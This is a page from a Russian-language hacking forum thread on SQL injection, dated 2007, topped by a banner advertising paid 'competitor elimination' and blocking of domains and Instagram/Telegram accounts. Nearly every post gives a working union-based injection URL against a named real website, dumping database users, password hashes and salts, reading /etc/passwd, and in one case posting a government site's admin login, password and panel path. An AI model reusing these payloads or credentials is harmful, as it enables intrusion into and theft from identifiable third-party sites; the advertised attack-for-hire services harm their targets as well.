УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.

		Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
SQL Инъекции

Страница 136 из 1242

136

Опции темы

Поиск в этой теме

Опции просмотра

#1351

24.03.2007, 22:22

random

Познающий

Регистрация: 05.09.2006

Сообщений: 50

Провел на форуме:
1988972

Репутация: 250

Код:

http://www.flirtanica.ru/articles1.php?id=-33+union+select+1,version(),3,4,5/*

#1352

24.03.2007, 22:30

Constantine

Members of Antichat - Level 5

Регистрация: 24.11.2006

Сообщений: 927

Провел на форуме:
7192869

Репутация: 3033

Код:

http://www.keckobservatory.org/article.php?id=-103+union+select+1,convert(concat_ws(char(58),user(),version(),database())+using+latin1),3,4,5,6,7,8+from+mysql.user/*

Код:

http://director-online.com/buildArticle.php?id=-1154+union+select+1,2,3,4,5,convert(concat(user_password,char(58),user_name)+using+latin1),7,8+from+user/*

Чтобы убедиться в работоспособности этой скули вам придеться дожаться пока страница загрузиться, потом прокрутить всю страничку доконца,
и только после этого увидеть информацию, короче изврат. минус подставить даже не пытайтесь))

Код:

http://sistem.gemtech.fr/cours.php?Id=2+union+select+1,2,convert(concat_ws(char(58),version(),user(),database())+using+latin1),4,5,6,7,8,9,10,11,12,13,14,15,16,17/*

__________________

Дети индиго - это бездари, не надо песен! В пять лет едва говорить начинают, мы в этом возрасте стихи наизусть читали!

з.ы http://www.youtube.com/watch?v=sNsQe0KByRY Я ПлакалЪ

#1353

24.03.2007, 22:56

XTErner

Участник форума

Регистрация: 13.03.2007

Сообщений: 120

Провел на форуме:
1604641

Репутация: 590

Код:

http://www.terrabike.com/shop/shop_faqs.php?id=-1+union+select+table_name,2+from+INFORMATION_SCHEMA.TABLES+limit+37,1/*

#1354

24.03.2007, 23:11

Colkru

Участник форума

Регистрация: 13.01.2007

Сообщений: 160

Провел на форуме:
865816

Репутация: 181

Отправить сообщение для Colkru с помощью ICQ

Код:

http://www.bullchart.de/beitrag.php?id=-1+union+select+1,2,3,4,5,concat(username,char(58),password),7,8,9+from+vb_user/*

Зарегано 24757 пользователей на форуме)))

________

Код:

http://www.marotori.com/bestwebdevelopmentanddesign.php?id=-1+union+select+1,2+from+mysql.user/*

Последний раз редактировалось Colkru; 24.03.2007 в 23:26..

#1355

24.03.2007, 23:53

}{0TT@БЬ)Ч

Постоянный

Регистрация: 20.01.2006

Сообщений: 302

Провел на форуме:
3536885

Репутация: 447

http://www.activeserverpages.ru/faq/default.asp?mode=view&id=1+or+1=@@version--
перебираем через not in

#1356

25.03.2007, 02:12

XTErner

Участник форума

Регистрация: 13.03.2007

Сообщений: 120

Провел на форуме:
1604641

Репутация: 590

Код:

http://apps.sais-jhu.edu/faculty_bios/faculty_bio1.php?ID=-30%20UNION%20SELECT%201,2,3,4,LOAD_FILE(0x2f6574632f706173737764),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24/*

#1357

25.03.2007, 02:18

злюка

Постоянный

Регистрация: 11.11.2005

Сообщений: 317

Провел на форуме:
2848854

Репутация: 409

Отправить сообщение для злюка с помощью ICQ

Цитата:

Сообщение от Colkru

Код:

http://www.bullchart.de/beitrag.php?id=-1+union+select+1,2,3,4,5,concat(username,char(58),password),7,8,9+from+vb_user/*

Зарегано 24757 пользователей на форуме)))

ты не заметил что форум хостится в другом месте, и эта таблицу к форуму отношения не имеет.

#1358

25.03.2007, 02:19

n1†R0x

Постоянный

Регистрация: 20.01.2007

Сообщений: 787

Провел на форуме:
2924346

Репутация: 1719

Отправить сообщение для n1†R0x с помощью ICQ

Код:

http://www.4site.ru/faq/index.shtml?th=-1+union+select+1,2,AES_DECRYPT(AES_ENCRYPT(concat(user,0x3a,password),0x00),0x00),4+from+mysql.user/*

Код:

http://www.4site.ru/faq/index.shtml?th=-1+union+select+1,2,LOAD_FILE(0x2f6574632f706173737764),4/*

#1359

25.03.2007, 07:02

Muhacir

Участник форума

Регистрация: 05.10.2006

Сообщений: 133

Провел на форуме:
548338

Репутация: 165

Отправить сообщение для Muhacir с помощью ICQ

gov.tr

Код:

http://afyonozelidare.gov.tr/karar.asp?id=-1%20union%20select%200,sifre,kulladi,3%20from%20admin

User:afyonozelidare
Pass:afyon03

Panel:/admin

#1360

25.03.2007, 10:42

InferNo23

Участник форума

Регистрация: 05.09.2006

Сообщений: 187

Провел на форуме:
6860213

Репутация: 378

VamShop.ru

Код:

http://vamshop.ru/support/modules/wflinks/viewcat.php?cid=5+union+select+1,2,concat(convert(membername+using+cp1251),0x3a,convert(passwd+using+cp1251),0x3a,convert(passwordsalt+using+cp1251)),4,5,6,7,8,9,10,11,12,13,14+from+smf_members/*

логин:хеш:соль

Код:

http://www.voex.com/news/newsandarticles_article.php?DID=-1+union+select+1,version(),3,user(),5,6,7,database(),9,10,11,12,13,14,15/*

Последний раз редактировалось InferNo23; 25.03.2007 в 11:17.. Причина: соль забыл

Страница 136 из 1242

136

« Предыдущая тема | Следующая тема »

Похожие темы
Тема	Автор	Раздел	Ответов	Последнее сообщение
Обнаружение Sql инъекций в Oracle, часть вторая	k00p3r	Чужие Статьи	0	13.06.2005 11:26
SQL инъекция и Oracle, часть 2	k00p3r	Чужие Статьи	0	13.06.2005 11:24
Sql инъекция и Oracle, часть первая	k00p3r	Чужие Статьи	0	13.06.2005 11:23
Внедрение Sql кода с завязанными глазами	k00p3r	Чужие Статьи	0	12.06.2005 20:48
SQL Injection в Oracle	k00p3r	Чужие Статьи	0	12.06.2005 12:41

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)

Быстрый переход